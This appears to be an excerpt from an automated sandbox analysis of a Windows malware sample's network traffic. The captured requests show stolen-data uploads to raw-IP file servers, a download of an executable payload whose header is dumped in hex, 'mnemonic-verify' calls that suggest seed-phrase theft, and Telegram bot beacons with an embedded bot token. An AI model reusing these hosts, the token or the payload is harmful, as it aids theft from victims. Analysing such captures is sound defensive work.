                                                                                                                                                                                                Sep 27, 2024 23:27:58.570437908 CEST4944OUTData Raw: f3 dc aa 8f c7 fb bc 05 9b ec ce 21 79 30 7d 35 56 c1 68 97 48 86 63 a5 f9 f6 f2 2d 8b 11 a3 45 20 7c cf 8e 28 15 a1 d2 c8 5c 88 d0 47 5f 89 c5 a7 cd 7f cb 0c e5 2f d1 ef 6d 5d ad 85 43 8e f7 9d cc 50 08 e3 d0 7d 92 76 1a f8 31 28 c7 3c 1d 4a ab
                                                                                                                                                                                                Data Ascii: !y0}5VhHc-E |(\G_/m]CP}v1(<JszNEC,K~xh/T9}3l0U"hp}c[+Q%tS)E TUv1k$$9>X+B MgL`*y]&(GHeP)?%}{n..a
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570457935 CEST2472OUTData Raw: e3 99 98 a4 e3 f8 33 7f a8 fd c5 ad ad 0c 38 d4 d7 dd 58 5d fa c7 2b 56 79 d8 3f 40 e9 83 9c a9 45 d8 2f 8e 2e 63 f5 aa 18 1c 16 42 1c 26 4c e2 7b 62 db 2c 8b 28 e2 9f 31 18 e6 1c c0 29 c0 7a 4e ed a6 26 61 2c 77 84 83 89 de 51 dc ef 9d f1 3d c4
                                                                                                                                                                                                Data Ascii: 38X]+Vy?@E/.cB&L{b,(1)zN&a,wQ=1Q\+0m7PIEbrPGN7>;qEQz|2U[myz_hA&e!*R`b0cHFgum1\1G&t^
                                                                                                                                                                                                Sep 27, 2024 23:27:58.570485115 CEST2472OUTData Raw: d7 f7 45 6e 47 fa 6f 7f 00 c6 80 65 0c 8b 90 c6 28 29 08 4c 2b 07 ef b3 fe e5 ec 6d a5 c9 14 4c 8e 4b 22 a7 bf 20 5a 59 a6 a8 03 a9 c9 2a 30 38 6b af 33 66 80 46 80 12 7b f3 b9 62 3c d0 46 cf 5f b9 84 a6 35 73 b2 a9 dc 47 48 34 c4 43 88 79 56 5b
                                                                                                                                                                                                Data Ascii: EnGoe()L+mLK" ZY*08k3fF{b<F_5sGH4CyV[vS-AQ(K.OOH.TDLkjq\N0]r\vW)"BwR8^h;('S%5EChpq{ANKVVUz$""4T
                                                                                                                                                                                                Sep 27, 2024 23:27:58.571568966 CEST2472OUTData Raw: 36 a9 14 91 0a 0b 98 34 56 f7 ac 46 bd 8f e5 ef f3 54 ac 46 2f 5e a1 35 10 2f a2 11 92 8a 7f 56 45 83 6d 8a 5d 36 d9 b0 6d f7 0c f5 81 81 e3 f0 ad af 17 3e e2 24 2e a2 ee 9f 57 06 02 8e 49 3f cd 4c ee 7e 20 d0 5a 83 9f fe 84 1c f7 1a cd 19 1f 6d
                                                                                                                                                                                                Data Ascii: 64VFTF/^5/VEm]6m>$.WI?L~ ZmAW~V9(zP`08b4AGXt6#&f~X*3,(,ldP"a^32fB42Y'C{:e`[;LM<V PwopW--((4k
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575158119 CEST2472OUTData Raw: 2c 55 99 ed b4 ad 53 da 91 47 e9 11 f0 85 28 07 f4 ad 96 1c 38 88 6d 18 f1 16 0f 2a dd bd 86 94 58 c8 b9 b0 4a 04 23 b2 93 03 4b c6 6a 31 0a 6e 79 3d b9 7f 0d 1c b0 83 15 7d 61 3d 4e 3c 8c 57 ff 09 8f cc 29 24 a5 85 7d 29 77 7b 2c 55 12 c2 09 e6
                                                                                                                                                                                                Data Ascii: ,USG(8m*XJ#Kj1ny=}a=N<W)$})w{,UONQ:v_e9 5Xky?UV;|HHY(V{(5d7X'[Zcb J;ccHC6hVy,G\ED#drDB*
                                                                                                                                                                                                Sep 27, 2024 23:27:58.575314045 CEST4944OUTData Raw: 5a f3 f8 f7 93 2b d8 df ad 77 74 d0 12 52 1b 53 af ea 11 a4 2e c0 b9 3e 3e 21 c2 2b 99 24 80 57 0a d6 70 80 45 40 d5 ca b5 94 b0 f7 46 b5 a1 98 c4 37 3c d0 fa 32 86 4e f9 b8 42 a3 c8 91 9d 2f 5f 9f 2c d4 28 d9 06 b2 84 5d cc b0 ef cb 30 4c 8f af
                                                                                                                                                                                                Data Ascii: Z+wtRS.>>!+$WpE@F7<2NB/_,(]0LU#1t)|%[0\tdY4.J>tFH?8iGaZDd?G&I{2]b0v1Vb^af?CI
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097068071 CEST313INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Server: Transfer.sh HTTP Server
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:27:59 GMT
                                                                                                                                                                                                Content-Length: 26
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 52 65 73 74 72 69 63 74 65 64 20 66 69 6c 65 20 65 78 74 65 6e 73 69 6f 6e 0a
                                                                                                                                                                                                Data Ascii: Restricted file extension


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.54973845.82.65.63801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:27:59.114850998 CEST139OUTPUT /9IYTn_user%40051829_report.wsr HTTP/1.1
                                                                                                                                                                                                Host: 45.82.65.63
                                                                                                                                                                                                Content-Length: 135595
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:27:59.471261978 CEST12360OUTData Raw: 57 53 52 24 1c 79 61 c6 46 bc d2 4e f5 e5 76 24 fe 33 be 62 71 d0 c8 da c1 1a 03 58 d4 dd c6 9d 3e b6 a0 3e af fd d4 97 e3 d7 9b 53 31 15 34 6c 34 16 50 6e 1b e8 51 cc f9 ce 6e 8f 3c 04 26 38 47 6c e0 47 d1 19 94 3b 75 d8 c2 ec e0 f6 eb 72 45 1d
                                                                                                                                                                                                Data Ascii: WSR$yaFNv$3bqX>>S14l4PnQn<&8GlG;urEPznzqAU9U?81+lZznP%|y}S40:NMhO{:i=*m3]\uhUnYY6v[1)'yq
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476480007 CEST4944OUTData Raw: a2 a1 fe 2e 3f e0 b2 c4 15 06 d2 8b 5e d1 d1 22 d2 c8 ac a2 c9 e0 f9 f7 92 97 aa db a9 44 2e 70 66 94 db 44 d0 84 59 a2 69 6b 70 40 cc 61 32 02 a8 09 51 f9 c8 00 56 ba 52 47 80 ab b9 46 14 2f 85 dd cb ef d6 be 3d 66 8e 1c 5f 57 57 ab bd 5c 73 4b
                                                                                                                                                                                                Data Ascii: .?^"D.pfDYikp@a2QVRGF/=f_WW\sK6i0.,bw4GCZ]R4yoPi15B9} iO4U?ISxHI$~s6qK9~9S"<'bPp{77:h$DMaNX$"Y*
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476531982 CEST2472OUTData Raw: 40 1e 07 f5 c4 92 78 06 56 2d 8f 9a b2 e7 0d f3 bc 59 3c 5c 17 6a ea 64 07 14 4f 66 fc ce a0 cf d9 3a 53 d6 1b a5 d6 6f 69 7a a5 f9 93 13 08 b2 d1 9b a6 8b 96 98 d7 d1 69 53 2c 22 2d ba 81 05 38 35 00 6d 38 d8 2a 84 88 e4 46 d4 01 13 c5 9b 57 27
                                                                                                                                                                                                Data Ascii: @xV-Y<\jdOf:SoiziS,"-85m8*FW'$r&wB]{k$^(7ALX\Rx=AkCs'*A;Pzxte)7wyR5 Qix6Tk5Plt]s
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476612091 CEST2472OUTData Raw: 6d bc 86 9d b9 03 4c 9e 1a e4 f6 83 d5 c1 b5 45 e3 a1 9f 15 3f f2 0c d7 1d 4b d4 28 9c 97 d6 e6 c0 25 f0 cd d8 c5 08 99 30 2a a5 13 c7 00 01 d5 09 a4 d8 ae f5 5d 59 8d 43 7d 54 c2 2a 5e 40 f6 b4 28 88 a9 2c 40 b2 e5 96 82 a9 05 97 76 29 4b a5 19
                                                                                                                                                                                                Data Ascii: mLE?K(%0*]YC}T*^@(,@v)KgR=;2H{@@1uC"Hg?]4c3+`=N_^t,d3*sZlaaw_Q?.Wh~_r[E*gsA=\TED:E{9
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476641893 CEST4944OUTData Raw: 30 ce 79 f7 02 a6 14 55 ef 1c 7a c5 70 69 a4 e9 da 0b 0e 16 cc 6a 42 d1 8f 8f de 0f 08 85 1e 35 90 3d d4 fb 9c 36 0b ab 79 96 88 53 b2 1d c4 77 52 f6 86 75 44 4a 16 58 90 b4 fd a0 06 6f 67 52 de 67 6c 7b 61 fa 1b a0 52 da 64 e3 21 2c 45 03 22 91
                                                                                                                                                                                                Data Ascii: 0yUzpijB5=6ySwRuDJXogRgl{aRd!,E"LTU9"^3%kn.`n+6kJ"SNz(tw#FP (Tb^NZwcI'Y2afk%:U`j\.M8:
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476725101 CEST4944OUTData Raw: b9 61 d5 99 a5 dc c0 8d 5d 9f 8d d2 b3 77 29 13 9d 93 b2 a2 50 04 a2 96 dd e5 f0 67 a9 95 02 ba 10 9f b0 e8 e9 5d c5 2d 19 29 c2 76 4d c7 a0 dc 4d 9f 30 0d cd e2 6a e4 c4 a1 69 68 26 a7 b2 44 cb 00 5a 66 13 df 7a 3e 7d 77 85 a1 cd 7a 39 b9 7b 12
                                                                                                                                                                                                Data Ascii: a]w)Pg]-)vMM0jih&DZfz>}wz9{j_|x7mT|WD`-_ZgMx@@`iydUA-SNuU+r>Tu&|ym{QV)tuWE\'[CSIm!mu2-
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476766109 CEST2472OUTData Raw: d7 f7 45 6e 47 fa 6f 7f 00 c6 80 65 0c 8b 90 c6 28 29 08 4c 2b 07 ef b3 fe e5 ec 6d a5 c9 14 4c 8e 4b 22 a7 bf 20 5a 59 a6 a8 03 a9 c9 2a 30 38 6b af 33 66 80 46 80 12 7b f3 b9 62 3c d0 46 cf 5f b9 84 a6 35 73 b2 a9 dc 47 48 34 c4 43 88 79 56 5b
                                                                                                                                                                                                Data Ascii: EnGoe()L+mLK" ZY*08k3fF{b<F_5sGH4CyV[vS-AQ(K.OOH.TDLkjq\N0]r\vW)"BwR8^h;('S%5EChpq{ANKVVUz$""4T
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476815939 CEST2472OUTData Raw: 36 a9 14 91 0a 0b 98 34 56 f7 ac 46 bd 8f e5 ef f3 54 ac 46 2f 5e a1 35 10 2f a2 11 92 8a 7f 56 45 83 6d 8a 5d 36 d9 b0 6d f7 0c f5 81 81 e3 f0 ad af 17 3e e2 24 2e a2 ee 9f 57 06 02 8e 49 3f cd 4c ee 7e 20 d0 5a 83 9f fe 84 1c f7 1a cd 19 1f 6d
                                                                                                                                                                                                Data Ascii: 64VFTF/^5/VEm]6m>$.WI?L~ ZmAW~V9(zP`08b4AGXt6#&f~X*3,(,ldP"a^32fB42Y'C{:e`[;LM<V PwopW--((4k
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481331110 CEST2472OUTData Raw: 2c 55 99 ed b4 ad 53 da 91 47 e9 11 f0 85 28 07 f4 ad 96 1c 38 88 6d 18 f1 16 0f 2a dd bd 86 94 58 c8 b9 b0 4a 04 23 b2 93 03 4b c6 6a 31 0a 6e 79 3d b9 7f 0d 1c b0 83 15 7d 61 3d 4e 3c 8c 57 ff 09 8f cc 29 24 a5 85 7d 29 77 7b 2c 55 12 c2 09 e6
                                                                                                                                                                                                Data Ascii: ,USG(8m*XJ#Kj1ny=}a=N<W)$})w{,UONQ:v_e9 5Xky?UV;|HHY(V{(5d7X'[Zcb J;ccHC6hVy,G\ED#drDB*
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481400967 CEST7416OUTData Raw: 5a f3 f8 f7 93 2b d8 df ad 77 74 d0 12 52 1b 53 af ea 11 a4 2e c0 b9 3e 3e 21 c2 2b 99 24 80 57 0a d6 70 80 45 40 d5 ca b5 94 b0 f7 46 b5 a1 98 c4 37 3c d0 fa 32 86 4e f9 b8 42 a3 c8 91 9d 2f 5f 9f 2c d4 28 d9 06 b2 84 5d cc b0 ef cb 30 4c 8f af
                                                                                                                                                                                                Data Ascii: Z+wtRS.>>!+$WpE@F7<2NB/_,(]0LU#1t)|%[0\tdY4.J>tFH?8iGaZDd?G&I{2]b0v1Vb^af?CI
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006097078 CEST313INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Server: Transfer.sh HTTP Server
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:27:59 GMT
                                                                                                                                                                                                Content-Length: 26
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 52 65 73 74 72 69 63 74 65 64 20 66 69 6c 65 20 65 78 74 65 6e 73 69 6f 6e 0a
                                                                                                                                                                                                Data Ascii: Restricted file extension


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.549739188.120.242.7888171964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:28:00.012242079 CEST147OUTPUT /9IYTn_user%40051829_report.wsr HTTP/1.1
                                                                                                                                                                                                Host: 188.120.242.78:8817
                                                                                                                                                                                                Content-Length: 135595
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:28:00.693816900 CEST25INHTTP/1.1 100 Continue
                                                                                                                                                                                                Sep 27, 2024 23:28:01.051019907 CEST384INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Server: Transfer.sh HTTP Server
                                                                                                                                                                                                X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                X-Url-Delete: http://188.120.242.78:8817/JfGGV6ePde/9IYTn_user@051829_report.wsr/NVuxS9alFiH9FvhRGGHa
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:28:00 GMT
                                                                                                                                                                                                Content-Length: 68
                                                                                                                                                                                                Data Raw: 68 74 74 70 3a 2f 2f 31 38 38 2e 31 32 30 2e 32 34 32 2e 37 38 3a 38 38 31 37 2f 4a 66 47 47 56 36 65 50 64 65 2f 39 49 59 54 6e 5f 61 6c 66 6f 6e 73 40 30 35 31 38 32 39 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                                                                                                                Data Ascii: http://188.120.242.78:8817/JfGGV6ePde/9IYTn_user@051829_report.wsr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.549741185.80.128.17801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:28:02.060817957 CEST74OUTGET /manager.exe HTTP/1.1
                                                                                                                                                                                                Host: 185.80.128.17
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722192049 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:28:02 GMT
                                                                                                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                Last-Modified: Sun, 22 Sep 2024 18:44:49 GMT
                                                                                                                                                                                                ETag: "cc00-622b9aabbea40"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 52224
                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 98 e7 d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c2 00 00 00 08 00 00 00 00 00 00 de e1 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e1 00 00 57 00 00 00 00 00 01 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ @`W H.text `.rsrc@@.reloc @BHzfpmoom825gB\vUg6#ExF"(*s}rp}((so**^(}}**sl}o}r}s}t(}p}n*>{oom*>{poZ*:{po[*Z}}(*}(}{o}*Z}{o*Z}{
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722223043 CEST1236INData Raw: 00 00 04 16 6f 9f 00 00 0a 00 2a 2e 73 5d 00 00 06 80 b1 00 00 04 2a 0a 03 2a 3a 00 02 6f 39 00 00 06 28 ac 00 00 0a 00 2a 42 02 28 c0 00 00 0a 00 00 02 03 7d ff 00 00 04 2a 32 02 7b ff 00 00 04 6f c1 00 00 0a 2a 6e 00 7e ed 00 00 04 03 6f c2 00
                                                                                                                                                                                                Data Ascii: o*.s]**:o9(*B(}*2{o*n~o&{o*n~o&{o*6~o&*.s*(*(*0iZ3 (,+Yns(
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722234011 CEST1236INData Raw: 12 06 12 02 28 04 00 00 2b 00 dd c1 02 00 00 02 7b 18 00 00 04 13 06 02 7c 18 00 00 04 fe 15 05 00 00 1b 02 15 25 0a 7d 05 00 00 04 12 06 28 2e 00 00 0a 26 00 02 02 7b 08 00 00 04 7b 03 00 00 04 02 7b 10 00 00 04 6f 32 00 00 0a 02 7b 08 00 00 04
                                                                                                                                                                                                Data Ascii: (+{|%}(.&{{{o2{{o3(4}{o5r9po6}{{%{o7to8(9-E%}}|(+{|
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722445011 CEST1236INData Raw: 02 7d 1f 00 00 04 06 03 7d 1e 00 00 04 06 15 7d 1c 00 00 04 06 7c 1d 00 00 04 12 00 28 06 00 00 2b 06 7c 1d 00 00 04 28 1e 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 08 00 00 11 73 22 00 00 06 0a 06 28 1c 00 00 0a 7d 31 00 00 04 06 02 7d 33 00 00 04
                                                                                                                                                                                                Data Ascii: }}}|(+|(*0?s"(}1}3}2}0|1(+|1(*08s((}I}J}H|I(+|I(*0?s+(}R}T}S}Q|R
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722455025 CEST1236INData Raw: 1f fe 7d 1c 00 00 04 02 7c 1d 00 00 04 11 08 28 3e 00 00 0a 00 de 14 02 1f fe 7d 1c 00 00 04 02 7c 1d 00 00 04 28 3f 00 00 0a 00 2a 00 00 41 34 00 00 00 00 00 00 11 00 00 00 42 02 00 00 53 02 00 00 26 00 00 00 01 00 00 01 00 00 00 00 07 00 00 00
                                                                                                                                                                                                Data Ascii: }|(>}|(?*A4BS&t{0{&E+888{)}+{+}.{.E8{(((rp{*{{
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722464085 CEST1236INData Raw: 15 05 00 00 1b 02 15 25 0a 7d 30 00 00 04 12 06 28 2e 00 00 0a 26 de 36 13 08 02 1f fe 7d 30 00 00 04 02 14 7d 34 00 00 04 02 14 7d 35 00 00 04 02 14 7d 36 00 00 04 02 14 7d 37 00 00 04 02 7c 31 00 00 04 11 08 28 3e 00 00 0a 00 de 30 02 1f fe 7d
                                                                                                                                                                                                Data Ascii: %}0(.&6}0}4}5}6}7|1(>0}0}4}5}6}7|1(?*A60'{;E++F88r(o^(_-C%};}E
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722472906 CEST1236INData Raw: 02 18 25 0a 7d 48 00 00 04 02 11 07 7d 50 00 00 04 02 0c 02 7c 49 00 00 04 12 07 12 02 28 19 00 00 2b 00 dd 89 00 00 00 02 7b 50 00 00 04 13 07 02 7c 50 00 00 04 fe 15 0b 00 00 01 02 15 25 0a 7d 48 00 00 04 12 07 28 3a 00 00 0a 00 2b 00 00 02 14
                                                                                                                                                                                                Data Ascii: %}H}P|I(+{P|P%}H(:+}K{J{o9:{J{o7}H|I(>}H|I(?*AV]0{QE
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722846985 CEST1236INData Raw: 04 16 91 7d 62 00 00 04 02 02 7b 62 00 00 04 13 04 11 04 7d 64 00 00 04 02 7b 64 00 00 04 13 05 11 05 45 05 00 00 00 05 00 00 00 78 00 00 00 f0 00 00 00 66 01 00 00 6b 01 00 00 38 dc 01 00 00 02 7b 60 00 00 04 02 7b 5f 00 00 04 28 1b 00 00 06 6f
                                                                                                                                                                                                Data Ascii: }b{b}d{dExfk8{`{_(o8(9-E%}]}f|^(+{f|f%}](:8i{`{{_oo8(9-E%}]}f|^
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722856998 CEST1236INData Raw: 00 00 06 0a 06 28 77 00 00 0a 7d a6 00 00 04 06 02 7d a8 00 00 04 06 03 7d a7 00 00 04 06 15 7d a5 00 00 04 06 7c a6 00 00 04 12 00 28 23 00 00 2b 06 7c a6 00 00 04 28 79 00 00 0a 2a 00 13 30 03 00 1f 00 00 00 19 00 00 11 00 03 8e 69 04 8e 69 33
                                                                                                                                                                                                Data Ascii: (w}}}}|(#+|(y*0ii3ij(4++*0Fs@(w}v}y}w}x}u|v($+|v(y*0{u6++3%2(z}{
                                                                                                                                                                                                Sep 27, 2024 23:28:02.722865105 CEST1236INData Raw: 0a 2d 45 02 1b 25 0a 7d 75 00 00 04 02 11 0d 7d 86 00 00 04 02 0d 02 7c 76 00 00 04 12 0d 12 03 28 26 00 00 2b 00 dd b2 00 00 00 02 7b 86 00 00 04 13 0d 02 7c 86 00 00 04 fe 15 05 00 00 1b 02 15 25 0a 7d 75 00 00 04 02 12 0d 28 2e 00 00 0a 7d 84
                                                                                                                                                                                                Data Ascii: -E%}u}|v(&+{|%}u(.}{,Q}{y{w}t4&(}u}z}{|v(|#}u}z}{|v(}*A4(k
                                                                                                                                                                                                Sep 27, 2024 23:28:02.728369951 CEST1236INData Raw: 02 2b 05 38 94 00 00 00 00 02 7b 9a 00 00 04 7b 70 00 00 04 7b ae 00 00 04 14 fe 03 0b 07 39 9e 00 00 00 00 28 84 00 00 0a 02 7b 9a 00 00 04 7b 70 00 00 04 7b ae 00 00 04 fe 06 85 00 00 0a 73 86 00 00 0a 02 7b 9a 00 00 04 7b 70 00 00 04 7b ae 00
                                                                                                                                                                                                Data Ascii: +8{{p{9({{p{s{{p{so*+o8(9-C%}}|(++v{|%}(:"&{{p{%-&+({{p{


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.549743185.253.7.6080801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:28:03.244808912 CEST143OUTGET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1
                                                                                                                                                                                                Host: 185.253.7.60:8080
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.549746185.253.7.6080801964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605931044 CEST143OUTGET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1
                                                                                                                                                                                                Host: 185.253.7.60:8080
                                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.549712149.154.167.2204431964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-09-27 21:27:17 UTC607OUTGET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-09-27 21:27:17 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:27:17 GMT
                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                Content-Length: 1095
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                2024-09-27 21:27:17 UTC1095INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 32 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 33 35 34 38 39 36 36 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 6f 74 30 6e 65 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 6f 74 30 6e 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 37 38 34 37 32 33 38 39 2c 22 74 69 74 6c 65 22 3a 22 4d 61 6e 61 67 65 6d 65 6e 74 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 37 32 34 33 37 2c 22 74 65 78 74 22 3a 22 23 4d 53
                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":5211,"from":{"id":7935489665,"is_bot":true,"first_name":"Not0neBot","username":"Not0neBot"},"chat":{"id":-4578472389,"title":"Management","type":"group","all_members_are_administrators":true},"date":1727472437,"text":"#MS


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.549713149.154.167.2204435500C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
